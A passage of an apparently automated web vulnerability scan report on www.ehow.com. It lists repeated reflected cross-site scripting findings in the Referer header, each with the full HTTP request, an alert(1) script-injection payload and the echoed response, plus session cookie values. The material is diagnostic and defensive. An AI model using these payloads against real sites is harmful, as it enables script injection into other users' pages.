Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ede99</script><script>alert(1)</script>0bc15203d14

Response

4.590. http://www.ehow.com/computer-software/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/computer-software/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36b44</script><script>alert(1)</script>88e1c6f7fbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /computer-software/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=36b44</script><script>alert(1)</script>88e1c6f7fbf

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73075

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Computer Software - How To Information | eHow.com
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "36b44</script><script>alert(1)</script>88e1c6f7fbf";

       </script>
...[SNIP]...

4.591. http://www.ehow.com/computers/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/computers/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 612c9</script><script>alert(1)</script>c3e385f1396 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /computers/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=612c9</script><script>alert(1)</script>c3e385f1396

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75195

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Computers - How To Information | eHow.com</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "612c9</script><script>alert(1)</script>c3e385f1396";

       </script>
...[SNIP]...

4.592. http://www.ehow.com/culture-and-society/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/culture-and-society/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6b00</script><script>alert(1)</script>a19869a9edb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /culture-and-society/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e6b00</script><script>alert(1)</script>a19869a9edb

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72106

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Culture & Society - How To Information | eHow.com
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "e6b00</script><script>alert(1)</script>a19869a9edb";

       </script>
...[SNIP]...

4.593. http://www.ehow.com/diseases-and-conditions/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/diseases-and-conditions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc5a</script><script>alert(1)</script>37e4ac73692 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /diseases-and-conditions/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ccc5a</script><script>alert(1)</script>37e4ac73692

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71359

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Diseases & Conditions - How To Information | eHow
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ccc5a</script><script>alert(1)</script>37e4ac73692";

       </script>
...[SNIP]...

4.594. http://www.ehow.com/drugs-and-supplements/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/drugs-and-supplements/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f49e</script><script>alert(1)</script>3e4e9a8c938 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /drugs-and-supplements/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7f49e</script><script>alert(1)</script>3e4e9a8c938

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72768

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Drugs & Supplements - How To Information | eHow.c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "7f49e</script><script>alert(1)</script>3e4e9a8c938";

       </script>
...[SNIP]...

4.595. http://www.ehow.com/education/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/education/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db7f</script><script>alert(1)</script>d6aab24c643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /education/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4db7f</script><script>alert(1)</script>d6aab24c643

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75196

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Education - How To Information | eHow.com</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "4db7f</script><script>alert(1)</script>d6aab24c643";

       </script>
...[SNIP]...

4.596. http://www.ehow.com/ehow-family/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-family/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca2a5</script><script>alert(1)</script>f5705aabf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-family/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ca2a5</script><script>alert(1)</script>f5705aabf2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45090

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Family | eHow.com
</title>
       <meta charset
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ca2a5</script><script>alert(1)</script>f5705aabf2";

       </script>
...[SNIP]...

4.597. http://www.ehow.com/ehow-food/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-food/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7388</script><script>alert(1)</script>20d2e506214 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-food/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b7388</script><script>alert(1)</script>20d2e506214

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46152

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Food | eHow.com
</title>
       <meta charset="
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "b7388</script><script>alert(1)</script>20d2e506214";

       </script>
...[SNIP]...

4.598. http://www.ehow.com/ehow-health/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-health/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea496</script><script>alert(1)</script>4ae4d3fc73d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-health/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ea496</script><script>alert(1)</script>4ae4d3fc73d

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43325

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Health | eHow.com
</title>
       <meta charset
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ea496</script><script>alert(1)</script>4ae4d3fc73d";

       </script>
...[SNIP]...

4.599. http://www.ehow.com/ehow-home/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-home/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e7b4</script><script>alert(1)</script>d1b2f931b9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-home/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4e7b4</script><script>alert(1)</script>d1b2f931b9c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45118

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Home | eHow.com
</title>
       <meta charset="
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "4e7b4</script><script>alert(1)</script>d1b2f931b9c";

       </script>
...[SNIP]...

4.600. http://www.ehow.com/ehow-mobile.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-mobile.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e797</script><script>alert(1)</script>6668a22c52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-mobile.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9e797</script><script>alert(1)</script>6668a22c52

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24864

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Mobile | "How to do Almost Everything" by Ce
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9e797</script><script>alert(1)</script>6668a22c52";

       </script>
...[SNIP]...

4.601. http://www.ehow.com/ehow-money/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-money/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8810</script><script>alert(1)</script>75cdd571dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-money/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a8810</script><script>alert(1)</script>75cdd571dc

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46804

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Money | eHow.com
</title>
       <meta charset=
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "a8810</script><script>alert(1)</script>75cdd571dc";

       </script>
...[SNIP]...

4.602. http://www.ehow.com/ehow-style/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-style/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1092</script><script>alert(1)</script>7a563d731ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-style/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b1092</script><script>alert(1)</script>7a563d731ac

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45321

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Style | eHow.com
</title>
       <meta charset=
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "b1092</script><script>alert(1)</script>7a563d731ac";

       </script>
...[SNIP]...

4.603. http://www.ehow.com/ehow-tax-time/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-tax-time/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2780c</script><script>alert(1)</script>12a8c6bf20b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ehow-tax-time/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=2780c</script><script>alert(1)</script>12a8c6bf20b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43203

<!DOCTYPE html>
